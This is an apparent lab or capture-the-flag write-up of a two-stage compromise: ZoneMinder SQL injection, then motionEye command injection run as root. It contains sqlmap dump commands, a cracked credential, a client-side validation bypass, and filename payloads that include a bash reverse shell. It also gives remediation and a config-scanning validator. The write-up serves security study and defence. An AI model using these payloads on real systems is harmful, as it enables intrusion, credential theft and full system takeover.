## https://sploitus.com/exploit?id=BBFABA9F-EA49-5BC3-90BB-6324CC90206A
# Security Research: Multi-Stage Exploitation of Web-Based Surveillance Systems
This document details a multi-stage exploitation scenario involving an SQL Injection vulnerability in a web application and a Remote Code Execution (RCE) vulnerability in a connected video surveillance system. The objective is to demonstrate a complete compromise chain, from initial access to full system control.
---
## 1. Initial Access: SQL Injection in ZoneMinder (CVE-2024-51428)
### 1.1 Vulnerability Description
The web application, identified as **ZoneMinder version 1.37.63**, was found to be vulnerable to an authenticated SQL Injection (**CVE-2024-51428**). This vulnerability allows an attacker to inject malicious SQL queries through the `tid` parameter within the `removetag` action of the `event` request.
### 1.2 Vulnerability Detection and Enumeration
To confirm the vulnerability, an authenticated session cookie (`ZMSESSID`) is required. The following `sqlmap` command identifies the injection point:
```bash
sqlmap -u "http:///zm/index.php?view=request&request=event&action=removetag&tid=1" \
--cookie="ZMSESSID=" \
-p tid --dbms=mysql --batch
```
Once confirmed, the database can be enumerated to extract user credentials:
1. **Enumerate Databases:**
```bash
sqlmap -u "http:///zm/index.php?view=request&request=event&action=removetag&tid=1" \
--cookie="ZMSESSID=" \
-p tid --dbms=mysql --batch --dbs
```
2. **Dump Usernames from `zm.Users`:**
```bash
sqlmap -u "http:///zm/index.php?view=request&request=event&action=removetag&tid=1" \
--cookie="ZMSESSID=" \
-p tid --dbms=mysql --batch -D zm -T Users -C "Username" --dump
```
| Username |
| :--- |
| admin |
| mark |
| superadmin |
3. **Extract Password Hash for User `mark`:**
```bash
sqlmap -u "http:///zm/index.php?view=request&request=event&action=removetag&tid=1" \
--cookie="ZMSESSID=" \
-p tid --dbms=mysql --batch -D zm -T Users -C "Password" --where="Username='mark'" --dump
```
| Username | Password (Bcrypt Hash) |
| :--- | :--- |
| mark | `$2y$10$prZGnazejKcuTv5bKNexXOgLyQaok0hq07LW7AJ/QNqZolbXKfFG.` |
### 1.3 Credential Cracking and System Access
The extracted bcrypt hash can be cracked using `John the Ripper`:
```bash
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
john --show hash.txt
```
> **Result**: `mark:opensesame`
With these credentials, initial system access is established via SSH:
```bash
ssh mark@
# Password: opensesame
```
---
## 2. Privilege Escalation: motionEye Remote Code Execution
### 2.1 Vulnerability Overview
**motionEye** (versions up to and including **0.43.1b4**) is vulnerable to Remote Code Execution (RCE) due to improper input validation of configuration parameters. Specifically, the application takes user input from the web dashboard and writes it directly into Motion configuration files (`/etc/motioneye/camera-X.conf`) without sanitizing dangerous shell characters.
### 2.2 Discovery and Port Forwarding
Internal enumeration reveals the motionEye service running locally on port **8765**. Access is achieved via SSH port forwarding:
```bash
ssh -L 8765:127.0.0.1:8765 mark@
```
The configuration file `/etc/motioneye/motion.conf` provides the admin password hash:
```bash
cat /etc/motioneye/motion.conf
# @admin_username admin
# @admin_password 989c5a8ee87a0e9521ec81a79187d162109282f0
```
### 2.3 Client-Side Validation Bypass
The web UI attempts to block shell syntax in fields like **Image File Name** using a JavaScript function `configUiValid()`. This can be bypassed by overriding the function in the browser console (F12):
```javascript
configUiValid = function() { return true; };
```
### 2.4 Exploitation via Command Injection
Once validation is bypassed, arbitrary commands can be injected into the **Image File Name** field. When Motion processes the `picture_filename` directive, it evaluates shell syntax like `$(command)`.
#### Method A: Manual Injection via Web UI
1. Navigate to **Still Images** > **Image File Name**.
2. Set the value to: `$(touch /tmp/test).%Y-%m-%d-%H-%M-%S`
3. Apply settings and trigger a snapshot:
```bash
curl "http://127.0.0.1:7999/1/action/snapshot"
```
#### Method B: Automated Exploit Script
The following Python script automates the API authentication and command injection process:
```python
import hashlib, urllib.parse, urllib.request, json, re, time

MOTIONEYE_URL = 'http://127.0.0.1:8765'
MOTION_URL = 'http://127.0.0.1:7999'
ADMIN_HASH = '989c5a8ee87a0e9521ec81a79187d162109282f0'

def compute_signature(method, path, body, key):
    # Standard motionEye HMAC signature algorithm
    # ... (implementation details omitted for brevity)
    return signature

def execute_as_root(command):
    # 1. Get current camera config
    # 2. Inject command into 'image_file_name'
    # 3. Post updated config to /config/1/set/
    # 4. Trigger snapshot via Motion API
    pass
```
### 2.5 Achieving Full System Compromise
Since the Motion daemon runs with **root privileges**, injected commands are executed as root.
**Payload for Root Flag:**
```text
$(cp /root/root.txt /tmp/root_flag.txt && chmod 644 /tmp/root_flag.txt).%Y-%m-%d-%H-%M-%S
```
**Weaponizing for Reverse Shell:**
```text
$(python3 -c "import os;os.system('bash -c \"bash -i >& /dev/tcp//4444 0>&1\"')").%Y-%m-%d-%H-%M-%S
```
---
## 3. Root Cause and Remediation
### 3.1 Root Cause Analysis
The vulnerability exists because unsanitized input is passed through the following chain:
`Dashboard JS` → `ConfigHandler.set_config()` → `camera-1.conf` → `motionctl.restart()` → `Motion` parses `picture_filename` → `Shell Execution`.
### 3.2 Remediation: Input Sanitization
The recommended fix involves sanitizing the `image_file_name` field in `config.py` to allow only safe characters:
```python
from re import sub

def sanitize_filename(value):
    # Allow only letters, numbers, %, ., _, -, /
    return (sub(r'[^A-Za-z0-9._%/-]', '_', value).lstrip('/') or '%Y-%m-%d/%H-%M-%S')

# Apply sanitization in motion_camera_ui_to_dict
data['picture_filename'] = sanitize_filename(ui['image_file_name'])
```
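As an added defensive example (not code from this page or from the motionEye project), the following Python shows the stricter alternative to the character-replacement sanitizer above: a server-side validator that rejects a `picture_filename` value outright instead of rewriting it, so a tampered value surfaces as an error rather than a silently altered filename. It goes beyond the page's fix by also refusing parent-directory segments and unknown `%` conversion specifiers. The same check is then applied by a small scanner to Motion-style `key value` configuration text, which lets an operator detect a directive that has already been written through as described in section 2.4. The function names, the specifier allow-list, and the two sample configuration texts are assumptions constructed for this example.

```python
import re

# Characters permitted in a picture_filename value: the same allow-list the page's
# sanitizer uses, applied here as a hard reject rather than a rewrite.
SAFE_CHAR = re.compile(r'[A-Za-z0-9._%/-]')
SAFE_VALUE = re.compile(r'[A-Za-z0-9._%/-]+')
# Conversion specifiers accepted after '%'. Assumption: an illustrative subset of
# Motion's strftime-style specifiers; extend it from Motion's documentation.
ALLOWED_SPECIFIERS = set('YmdHMSvqtDN%')
SPECIFIER = re.compile(r'%(.?)')
MAX_LEN = 255


def validate_picture_filename(value):
    """Return (ok, reason). Rejects anything outside the allow-list instead of
    silently rewriting it, so a tampered value is reported as an error."""
    if not value or len(value) > MAX_LEN:
        return False, 'empty or too long'
    if not SAFE_VALUE.fullmatch(value):
        bad = sorted({ch for ch in value if not SAFE_CHAR.fullmatch(ch)})
        return False, 'disallowed characters: ' + repr(bad)
    if value.startswith('/'):
        return False, 'absolute path not allowed'
    if any(segment == '..' for segment in value.split('/')):
        return False, 'parent-directory segment not allowed'
    for match in SPECIFIER.finditer(value):
        if match.group(1) not in ALLOWED_SPECIFIERS:
            return False, 'unknown conversion specifier: %' + match.group(1)
    return True, 'ok'


def find_unsafe_directives(config_text, directive='picture_filename'):
    """Scan Motion-style 'key value' config text and return (line_no, value, reason)
    for every occurrence of `directive` whose value fails validation."""
    findings = []
    for line_no, raw in enumerate(config_text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith('#'):
            continue
        parts = line.split(None, 1)  # keep any whitespace inside the value itself
        if len(parts) != 2 or parts[0] != directive:
            continue
        ok, reason = validate_picture_filename(parts[1])
        if not ok:
            findings.append((line_no, parts[1], reason))
    return findings


# Constructed sample configs modelled on /etc/motioneye/camera-1.conf (not real files).
CLEAN_CONFIG = """\
# constructed sample
camera_name Camera1
target_dir /var/lib/motioneye/Camera1
picture_filename %Y-%m-%d/%H-%M-%S
movie_filename %Y-%m-%d/%H-%M-%S
"""

# The same constructed file after the injection from section 2.4 has been written through.
TAMPERED_CONFIG = """\
# constructed sample
camera_name Camera1
target_dir /var/lib/motioneye/Camera1
picture_filename $(touch /tmp/test).%Y-%m-%d-%H-%M-%S
movie_filename %Y-%m-%d/%H-%M-%S
"""

if __name__ == '__main__':
    for name, text in (('clean', CLEAN_CONFIG), ('tampered', TAMPERED_CONFIG)):
        for line_no, value, reason in find_unsafe_directives(text):
            print(f'{name}: line {line_no}: {reason}: {value!r}')
```

Rejecting rather than rewriting matters for the chain in section 3.1: a rewritten value still reaches `camera-1.conf` and a Motion restart, whereas a rejected one stops at `ConfigHandler.set_config()` with an error the dashboard can show. The scanner is deliberately independent of motionEye so it can be run over existing configuration files as a one-off integrity check.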
---
## 4. Key Security Lessons
1. **Trust No Client**: Client-side validation is a convenience feature, not a security boundary.
2. **Sanitize All Inputs**: Any data written to system configuration files must be strictly validated against a whitelist of safe characters.
3. **Privilege Separation**: Daemons that process user-controlled configuration files should not run as root unless absolutely necessary.
4. **Defense in Depth**: Secure the internal management interfaces and configuration files to prevent credential leakage.
---
## 5. References
* **motionEye Project**: [GitHub](https://github.com/motioneye-project/motioneye)
* **CWE-78**: OS Command Injection
* **CWE-20**: Improper Input Validation
* **CWE-116**: Improper Encoding or Escaping of Output